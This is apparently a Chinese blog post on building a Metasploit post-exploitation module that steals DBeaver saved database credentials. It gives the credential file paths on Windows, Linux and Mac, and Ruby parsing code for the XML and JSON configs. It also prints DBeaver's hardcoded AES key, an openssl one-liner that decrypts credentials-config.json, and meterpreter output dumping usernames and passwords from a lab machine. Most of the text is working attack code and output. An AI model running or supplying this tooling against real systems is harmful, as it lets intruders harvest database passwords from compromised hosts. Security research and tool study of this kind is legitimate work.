前言

凭证存放的路径

系统 路径
Window C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\
Linux ~/.local/share/DBeaverData/workspace6/General/.dbeaver
Mac ~/Library/DBeaverData/workspace6/General/.dbeaver/
系统 路径
Window C:\Users\FireEye\.dbeaver4\General\.dbeaver-data-sources.xml
Linux ~/.dbeaver/General/
Mac ~/.dbeaver/General/
{
	"folders": {},
	"connections": {
		"mysql8-1849e7eaca6-1d233a585c8f4388": {
			"provider": "mysql",
			"driver": "mysql8",
			"name": "db",
			"save-password": true,
			"read-only": false,
			"configuration": {
				"host": "localhost",
				"port": "3306",
				"database": "db",
				"url": "jdbc:mysql://localhost:3306/db",
				"home": "mysql_client",
				"type": "dev",
				"auth-model": "native",
				"handlers": {}
			}
		}
	},
	"connection-types": {
		"dev": {
			"name": "Development",
			"color": "255,255,255",
			"description": "Regular development database",
			"auto-commit": true,
			"confirm-execute": false,
			"confirm-data-change": false,
			"auto-close-transactions": false
		}
	}
}

版本配置合并

Untitled

数据提取

XML文件的

def parse_xml(data)
  mxml = REXML::Document.new(data).root
  result_hashmap = Hash.new
  mxml.elements.to_a('//data-sources//data-source//connection//').each do |node|
    if node.name == 'connection'
      data_source_id = node.parent.attributes['id']
      result_hashmap[data_source_id]= Hash[
        'provider'=>node.parent.attributes['provider'],
        'name'=>node.parent.attributes['name'],
        'host'=>node.attributes['host'],
        'port'=>node.attributes['port'],
        'database'=>node.attributes['database'],
        'url'=>node.attributes['url'],
        'user'=>node.attributes['user'],
        'password'=>decrypt_dbeaver_6_1_3(node.attributes['password']),
    ]
    end
  end
  print_good("#{result_hashmap}")
  return result_hashmap
end
[+] {"mysql8-184d21e1de1-62edc23b6c8c8636"=>{"provider"=>"mysql", "name"=>"Test_MYSQL", "host"=>"localhost", "port"=>"3306", "database"=>"db", "url"=>"jdbc:mysql://localhost:3306/db", "user"=>"root", "password"=>"test_password"}, "postgres-jdbc-184d221fd09-20a857415882add4"=>{"provider"=>"postgresql", "name"=>"Test_PostgreSQL", "host"=>"localhost", "port"=>"5432", "database"=>"postgres", "url"=>"jdbc:postgresql://localhost:5432/postgres", "user"=>"postgres", "password"=>"test_passwordr"}}

JSON文件的

def parse_data_sources(data, credentials)
  result_hashmap = Hash.new
  begin
    data_sources = JSON.parse(data)
    connections = data_sources['connections']
    connections.each do |data_source_id, item|
      result_hashmap[data_source_id] = Hash[
        'name' => item['name'],
        'provider' => item['provider'],
        'host' => item['configuration']['host'],
        'port' => item['configuration']['port'],
        'user' => credentials[data_source_id]['#connection']['user'],
        'password' => credentials[data_source_id]['#connection']['password'],
        'database' => item['configuration']['database'],
        'url' => item['configuration']['url'],
        'type' => item['configuration']['type']
    ]
    end
  rescue ::JSON::ParserError
    return result_hashmap
  end
  return result_hashmap
end

解密算法

Untitled

➜  ~ openssl aes-128-cbc -d -K babb4a9f774ab853c96c2d653dfe544a -iv 00000000000000000000000000000000 -in "${HOME}/Library/DBeaverData/workspace6/General/.dbeaver/credentials-config.json" | dd bs=1 skip=16 2>/dev/null
AES_KEY = "\\xBA\\xBBJ\\x9FwJ\\xB8S\\xC9l-e=\\xFETJ".freeze
def decrypt_dbeaver_credentials(data)
  aes = OpenSSL::Cipher.new('AES-128-CBC')
  begin
    aes.decrypt
    aes.key = AES_KEY
    plaintext = aes.update(data)
    plaintext << aes.final
  rescue OpenSSL::Cipher::CipherError => e
    puts "Unable to decode: \\"#{data}\\" Exception: #{e}"
  end
  return plaintext[plaintext.index('{"')..]
end

Untitled

效果

meterpreter > run post/windows/gather/credentials/dbeaver

[*] Gather Dbeaver Passwords on FireEye
[+] dbeaver .dbeaver-data-sources.xml saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_319751.txt
[*] Finished processing C:\\Users\\FireEye\\.dbeaver4\\General\\.dbeaver-data-sources.xml
[+] dbeaver credentials-config.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_334807.txt
[+] dbeaver data-sources.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_309767.txt
[*] Finished processing C:\\Users\\FireEye\\AppData\\Roaming\\DBeaverData\\workspace6\\General\\.dbeaver
[+] Passwords stored in: /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_host.dbeaver_421133.txt
[+] Dbeaver Password
================

Name             Protocol    Hostname   Port  Username  Password        DB        URI                                        Type
----             --------    --------   ----  --------  --------        --        ---                                        ----
Test_MYSQL       mysql       localhost  3306  root      test_password   db        jdbc:mysql://localhost:3306/db             dev
Test_PostgreSQL  postgresql  localhost  5432  postgres  test_passwordr  postgres  jdbc:postgresql://localhost:5432/postgres  dev
localhost        mysql       localhost  3306  root      test_mysql      db        jdbc:mysql://localhost:3306/db             test
postgres         postgresql  localhost  5432  postgres  test_postgres   postgres  jdbc:postgresql://localhost:5432/postgres  prod

meterpreter >

参考

https://github.com/rapid7/metasploit-framework/pull/17337

https://github.com/dbeaver/dbeaver/wiki/Admin-Manage-Connections

https://stackoverflow.com/questions/39928401/recover-db-password-stored-in-my-dbeaver-connection

Powered by Kali-Team